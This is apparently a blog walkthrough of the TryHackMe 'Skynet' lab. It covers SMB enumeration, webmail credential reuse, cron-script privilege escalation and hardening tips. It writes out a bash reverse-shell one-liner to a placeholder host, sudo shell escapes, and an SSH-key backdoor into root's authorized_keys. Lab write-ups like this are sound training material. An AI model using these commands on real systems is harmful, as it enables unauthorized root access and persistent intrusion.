Listen to this Post

Introduction:
The Skynet room on TryHackMe simulates a vulnerable Linux machine inspired by the Terminator franchise, challenging users to apply real-world enumeration, exploitation, and post-exploitation techniques. This hands-on lab focuses on Samba misconfigurations, web application flaws, and cron-based privilege escalation—core skills for any aspiring penetration tester or red teamer.
Learning Objectives:
- Enumerate open ports and services (SMB, HTTP, SSH) using Nmap and smbclient.
- Exploit anonymous Samba shares to retrieve sensitive credentials and gain initial access.
- Escalate privileges via a writable cron script that runs as root.
You Should Know:
- Reconnaissance & SMB Enumeration – Finding the Hidden Share
Start by scanning the target machine (e.g., 10.10.10.10). Skynet typically exposes ports 22 (SSH), 80 (HTTP), 139/445 (SMB). Use Nmap for a comprehensive scan:
nmap -sC -sV -p- 10.10.10.10 -oN skynet_scan.txt
Then enumerate SMB shares anonymously:
smbclient -L //10.10.10.10 -N
If you see a share like `anonymous` or samba, connect to it:
smbclient //10.10.10.10/anonymous -N
List files – often a `notes.txt` or `log.txt` containing usernames or passwords. Download everything:
smb: > mask "" smb: > recurse ON smb: > prompt OFF smb: > mget
Windows alternative using `net view` and mounting:
net view \10.10.10.10 net use Z: \10.10.10.10\anonymous
- Web Application Exploitation – SquirrelMail & Credential Reuse
After SMB enumeration, visit port 80. Skynet often runs a default webpage with a hidden directory `/squirrelmail/` (a webmail client). Use `gobuster` or dirb:
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirb/common.txt -x php,html,txt
Once you find /squirrelmail, look for credentials discovered earlier (e.g., from notes.txt). Login with those credentials – they often belong to a user like milesdyson. Inside SquirrelMail, search for emails containing passwords or hints for SSH access.
Example credential reuse:
- Username: `milesdyson`
– Password: `youfoundthepassword`
Then SSH into the box:
ssh [email protected]
3. Privilege Escalation via Cron Job Manipulation
Once on the machine as a low-privilege user, check for cron jobs:
cat /etc/crontab
Look for a script running as root every minute, e.g., /home/milesdyson/backup.sh. If the script is writable by your user, you can inject a reverse shell.
Step‑by‑step guide:
1. Verify write permissions: `ls -la /home/milesdyson/backup.sh`
2. Edit the script: `nano /home/milesdyson/backup.sh`
- Append a reverse shell one-liner (example using bash):
bash -i >& /dev/tcp/YOUR_IP/4444 0>&1
- Set up a netcat listener on your attack machine:
nc -lvnp 4444
- Wait for the cron to execute – you’ll get a root shell.
Alternative escalation: If sudo is misconfigured, run `sudo -l` to see allowed commands. Skynet sometimes allows `sudo /bin/less` or `sudo /bin/journalctl` – both can spawn a root shell via !sh.
4. Post-Exploitation & Persistence
After gaining root, capture flags and establish persistence. For Linux:
cat /root/root.txt cat /home/milesdyson/user.txt
Install a simple backdoor via SSH key:
echo "ssh-rsa AAAAB3..." >> /root/.ssh/authorized_keys
On Windows (if the lab had Windows), you’d use `reg add` or scheduled tasks – but Skynet is pure Linux.
5. Mitigation & Hardening Recommendations
To prevent attacks like Skynet:
- Disable anonymous SMB access: set `map to guest = Never` in
/etc/samba/smb.conf. - Use strong credentials and rotate them regularly.
- Restrict cron script write permissions: `chmod 750 /home/user/backup.sh` and set owner to root.
- Implement file integrity monitoring (AIDE, Tripwire) for critical scripts.
Linux command to secure cron scripts:
chown root:root /path/to/script.sh chmod 755 /path/to/script.sh
Windows equivalent (for scheduled tasks):
icacls C:\Scripts\task.ps1 /inheritance:r /grant:r SYSTEM:F
6. Automating Enumeration with Tools
Use `enum4linux` for deeper SMB enumeration:
enum4linux -a 10.10.10.10
For privilege escalation, run `linpeas.sh` (transfer to target):
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh chmod +x linpeas.sh ./linpeas.sh
What Undercode Say:
- Key Takeaway 1: Anonymous SMB shares remain a common entry point – always check `null session` access during internal penetration tests.
- Key Takeaway 2: Cron jobs with world‑writable scripts are a silent but deadly privilege escalation vector; audit them regularly.
The Skynet room brilliantly mirrors real‑world misconfigurations: one weak share leads to credentials, then webmail, then SSH, and finally root via a forgotten backup script. This chain highlights why layered security (no anonymous access, principle of least privilege for cron, and regular patching) is essential. Attackers only need one flaw; defenders must block them all.
Prediction:
As AI-driven attack tools automate enumeration (e.g., using LLMs to parse `smbclient` output or `linpeas` results), rooms like Skynet will become baseline training for blue teams. Expect more labs to incorporate AI-generated misconfigurations (e.g., dynamic cron scripts) to simulate adaptive adversaries. Meanwhile, defenders will increasingly adopt infrastructure-as-code scanners (Checkov, tfsec) to detect SMB and cron issues before deployment.
▶️ Related Video (80% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Tobias Arevalo – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


